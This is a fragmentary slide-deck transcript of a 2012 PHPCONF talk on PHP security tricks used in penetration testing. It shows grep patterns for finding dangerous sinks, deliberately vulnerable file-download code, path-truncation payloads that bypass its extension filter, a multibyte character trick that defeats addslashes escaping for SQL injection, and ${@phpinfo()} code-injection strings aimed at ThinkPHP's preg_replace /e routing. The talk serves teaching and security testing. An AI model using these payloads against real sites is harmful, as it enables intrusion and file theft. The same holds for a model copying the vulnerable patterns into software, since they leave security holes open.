Security in PHP 那些在滲透測試的小技巧

Transcript

1. 2012/11/03 @ PHPCONF <Orange@chroot.org>

2. • aka Orange • 2009 • 2011 • 2011 AVTOKYO

   • – – Web Security – Windows Vulnerability Exploitation

3. • CHROOT Security Group • NISRA • case. • Blog

   – http://blog.orange.tw/
4. None
5. None
6. None

7. ▪▪

8. None

9. <?php $url = $_GET['url']; echo urlencode( $url ); ?>

10. • Low – Sensitive Information Leakage… • Middle – Insecure

    File Download/Access… • High – Local File Inclusion, Code Injection, SQL Inj…
11. None

12. • – – –

13. • showNews.php?id=198 – showNews.php?id=198/1 • checkName.php?u=lala – checkName.php?u=lala%cc' • getFile.php?path=hsu.doc

    – getFile.php?path=./hsu.doc • main.php?module=index – main.php?module[]=index
14. None
15. None

16. 1. Router, Controller URL Mapping 2. 3. 4. DB ORM

    PHP orz

17. 1. – system exec shell_exec popen eval create_function call_user_func preg_replace…

    2. – _GET _POST _COOKIE _REQUEST _ENV _FILES _SERVER HTTP_RAW_POST_DATA php://input getenv …

18. • grep -Re – (include|require).+\$ – (eval|create_function|call_user_func|…).+\$ – (system|exec|shell_exec|passthru|…).+\$ –

    (select|insert|update|where|…).+\$ – (file_get_contents|readfile|fopen|…).+\$ – (unserialize|parse_str|…).+\$ – \$\$, $a\(\) – ……

19. • grep -Re – \$(_GET|_POST|_COOKIE|_REQUEST|_FILES) – \$(_ENV|_SERVER) – getenv –

    HTTP_RAW_POST_DATA – php://input – …

20. try { …… $trans->commit(); } catch (xxx_adapter_exception $e) { $trans->rollback();

    require_once 'xxx_exceptio$n.class.php' throw new xxx_exception( …… ); }
21. None
22. None

23. <?php $name = $_GET['name']; $name = basename( $name ); if

    ( eregi( "(.php|.conf)$", $name ) ) exit( "Not Allow PHP." ); else readfile( DOCUMENT_ROOT. $name ); ?>

24. • down.php?name= – config.php – config"php – config.ph> – config.<

    – c>>>>>"< – c<"< Test on PHP 5.4.8 newest stable version (2012/10/17) Original Will be replaced by < * > ? " .
25. None

26. • file_get_contents – > php_stream_open_wrapper_ex – > zend_resolve_path – >

    php_resolve_path_for_zend – > php_resolve_path – > tsrm_realpath – > virtual_file_ex – > tsrm_realpath_r
27. None

28. • file_get_contents • file_put_contents • file • readfile • phar_file_get_contents

    • include • include_once • require • require_once • fopen • opendir • readdir • mkdir • ……
29. None

30. • config.php/. • config.php///. • c>>>>>.</// Works on PHP 5.2.*

    (2012/10/26)
31. None

32. • Web Browser PHP Output (HTML) – Cross-Site Scripting •

    DB Management PHP Output (SQL) – SQL Injection

33. SELECT * FROM [table] WHERE username = 'PHPCONF'

34. SELECT * FROM [table] WHERE username = 'PHPCONF\''

35. SELECT * FROM [table] WHERE username = 'PHPCONF%cc\''

36. Σ( ° △ °|||)︴ Before After PHPCONF PHPCONF PHPCONF' PHPCONF\'

    PHPCONF%80' PHPCONF�\' PHPCONF%cc' PHPCONF岤' 0x81-0xFE 0x40-0x7E 0xA1-0xFE

37. • addslashes • mysql_escape_string • magic_quote_gpc • Special Cases –

    pdo – mysql_real_escape_st ring
38. None

39. • $url = "http://phpconf.tw/2012/"; • $url = "http://phpconf.tw/$year/"; • $url

    = "http://phpconf.tw/{$year}/"; • $url = "http://phpconf.tw/{${phpinfo()}}/"; • $url = "http://phpconf.tw/${@phpinfo()}/";

40. config.php $dbuser = "root";

41. config.php $dbuser = "${@phpinfo()}";

42. $res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); https://orange.tw/index.php?s=module/action/ param1/${@phpinfo()}

43. Think PHP

44. None

45. – – – – – –

46. • PHP Security – http://blog.php-security.org/ • Oddities of PHP file

    access in Windows®. – http://onsec.ru/onsec.whitepaper-02.eng.pdf
47. None